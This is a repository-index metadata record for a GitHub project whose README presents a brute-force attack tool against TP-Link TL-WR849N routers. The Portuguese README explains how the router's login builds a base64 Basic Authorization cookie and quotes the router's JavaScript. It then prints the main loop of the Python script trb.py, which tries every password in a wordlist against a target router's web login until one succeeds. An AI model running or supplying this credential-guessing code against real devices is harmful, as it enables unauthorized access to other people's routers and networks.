{"id":17189527,"url":"https://github.com/walderlansena/toolsrouterbrute","last_synced_at":"2026-03-11T11:06:04.537Z","repository":{"id":232892188,"uuid":"138450505","full_name":"WalderlanSena/toolsrouterbrute","owner":"WalderlanSena","description":":skull: :satellite: Tool to perform brute force attack on TPLink routers","archived":false,"fork":false,"pushed_at":"2019-06-12T02:56:30.000Z","size":269,"stargazers_count":16,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-07-13T01:31:56.578Z","etag":null,"topics":["brute-force","hacker","pentest","router","tools","tp-link"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/WalderlanSena.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2018-06-24T03:28:47.000Z","updated_at":"2025-03-04T13:16:05.000Z","dependencies_parsed_at":"2024-04-12T05:14:33.761Z","dependency_job_id":"2ccddda6-b7a0-4088-ac28-9e169f155e5e","html_url":"https://github.com/WalderlanSena/toolsrouterbrute","commit_stats":null,"previous_names":["walderlansena/toolsrouterbrute"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/WalderlanSena/toolsrouterbrute","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WalderlanSena%2Ftoolsrouterbrute","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WalderlanSena%2Ftoolsrouterbrute/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WalderlanSena%2Ftoolsrouterbrute/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WalderlanSena%2Ftoolsrouterbrute/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/WalderlanSena","download_url":"https://codeload.github.com/WalderlanSena/toolsrouterbrute/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/WalderlanSena%2Ftoolsrouterbrute/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30379265,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-11T06:09:32.197Z","status":"ssl_error","status_checked_at":"2026-03-11T06:09:17.086Z","response_time":84,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","hacker","pentest","router","tools","tp-link"],"created_at":"2024-10-15T01:11:52.159Z","updated_at":"2026-03-11T11:06:04.523Z","avatar_url":"https://github.com/WalderlanSena.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003eTools Router Brute\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003eTool to perform brute force attack on TPLink routers\u003c/p\u003e\n\n\u003ctable border=\"0\"\u003e\n    \u003ctr\u003e\n      \u003ctd\u003e\u003cimg src=\"https://github.com/WalderlanSena/toolsrouterbrute/blob/master/img/model1.jpg\" width=\"9000\"\u003e\u003c/td\u003e  \n      \u003ctd\u003e\n        \u003ch2 align=\"center\"\u003eModelo Roteador Wireless N 300Mbps\nTL-WR849N\u003c/h2\u003e\n        \u003cp\u003e\n          \u003cul align=\"justify\"\u003e\n            \u003cli\u003eVelocidade wireless de 300Mbps ideal para aplicações sensíveis a interrupções, como streaming de vídeo em HD\u003c/li\u003e\n            \u003cli\u003eFácil configuração da criptografia de segurança da rede wireless com um simples toque no botão WPS Controle de banda baseado em IP permite aos administradores determinarem que largura de banda será alocada para cada computador\u003c/li\u003e\n            \u003cli\u003eWDS wireless bridge fornece perfeita ponte para expandir a rede wireless\u003c/li\u003e\n          \u003c/ul\u003e\n        \u003c/p\u003e\n      \u003c/td\u003e\n    \u003c/tr\u003e\n\u003c/table\u003e\n\n\u003ch2\u003eFuncionamento da Autenticação do TP-Link - TL-WR849N\u003c/h2\u003e\n\n - Capturando url atual e subscrevendo o valor para o link definido no replace e redirecionando o usúario.\n - Criando uma variavél isLocker e atribuindo o valor false a mesma.\n - Deletando o cookie Authorization, vulgo responsável pela a autenticação.\n\n```javascript\nvar url = window.location.href;\n\nif (url.indexOf(\"tplinklogin.net\") \u003e= 0)\n{\n    url = url.replace(\"tplinklogin.net\", \"tplinkwifi.net\");\n    window.location = url;\n}\n\nvar isLocked = false;\n\ndeleteCookie(\"Authorization\");\n```\n\n\u003ch3\u003eFunção responsável implementar a hash base64, que é utilizada para setar o Cookie de autenticação.\u003c/h3\u003e\n\n```javascript\n\nfunction Base64Encoding(input)\n{\n\tvar keyStr = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\";\n\tvar output = \"\";\n\tvar chr1, chr2, chr3, enc1, enc2, enc3, enc4;\n\tvar i = 0;\n\tinput = utf8_encode(input);\n\twhile (i \u003c input.length)\n\t{\n\t\tchr1 = input.charCodeAt(i++);\n\t\tchr2 = input.charCodeAt(i++);\n\t\tchr3 = input.charCodeAt(i++);\n\t\tenc1 = chr1 \u003e\u003e 2;\n\t\tenc2 = ((chr1 \u0026 3) \u003c\u003c 4) | (chr2 \u003e\u003e 4);\n\t\tenc3 = ((chr2 \u0026 15) \u003c\u003c 2) | (chr3 \u003e\u003e 6);\n\t\tenc4 = chr3 \u0026 63;\n\n\t\tif (isNaN(chr2))\n\t\t{\n\t\t\tenc3 = enc4 = 64;\n\t\t}\n\t\telse if (isNaN(chr3))\n\t\t{\n\t\t\tenc4 = 64;\n\t\t}\n\t\toutput = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);\n\t}\n\treturn output;\n}\n```\n\n### Função que monitora o clique de login e captura os dados informado pelo usúario\n\n```javascript\n\nfunction PCWin(event)\n{\n\tif (event.keyCode == 13)\n\t{\n\t\tPCSubWin();\n\t}\n}\n\nfunction PCSubWin()\n{\n    // Verifica se o usúario não está bloqueado por alguns segundos\n    if (isLocked == true)\n     {\n\treturn;\n     }\n    // Criando uma variavel que receberá o base64 referente a autenticação\n    // E criando duas variavels para receber o userName e o password\n    var auth;\n    var password = $(\"pcPassword\").value;\n    var userName = $(\"userName\").value;\n\n    // Concatena a palavra \"Basic\" com a hash base64 de userName com \":\" e o password\n    auth = \"Basic \"+Base64Encoding(userName+\":\"+password);\n    // Atribui o valor ao Cookie do navegador com a chave Authorization e com o auth como conteúdo\n    document.cookie = \"Authorization=\" + auth;\n    // Recarrega a página\n    window.location.reload();\n}\n\n```\n\n### Entendendo o funcionamento do script trb.py\n\n```python\n\ndef main():\n    wordlist = open(sys.argv[3], 'r')\n    count = 0\n    for i in wordlist:\n\n        login = str(sys.argv[1])\n        password = i.rstrip()\n        auth  = \"Basic \"\n\n        authEncode = auth+base64.b64encode(login+':'+password)\n\n        cookie = {\"Authorization\": authEncode}\n\n        try:\n            response = r.get('http://'+sys.argv[2], cookies=cookie)\n        except:\n            splash()\n            print(\"\\tError to connect: \" + sys.argv[2])\n            exit(1)\n\n        if response.content.count('id=\"userName\"') != 1:\n            os.system('setterm -cursor on')\n            print('\\n\\tPassword Found =====\u003e ' + password)\n            exit(0)\n\n        os.system(\"clear\")\n        splash()\n        count = count + 1\n        print('\\t[ '+ str(count) + ' ] Password not found ===\u003e ' + password)   \n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwalderlansena%2Ftoolsrouterbrute","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwalderlansena%2Ftoolsrouterbrute","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwalderlansena%2Ftoolsrouterbrute/lists"}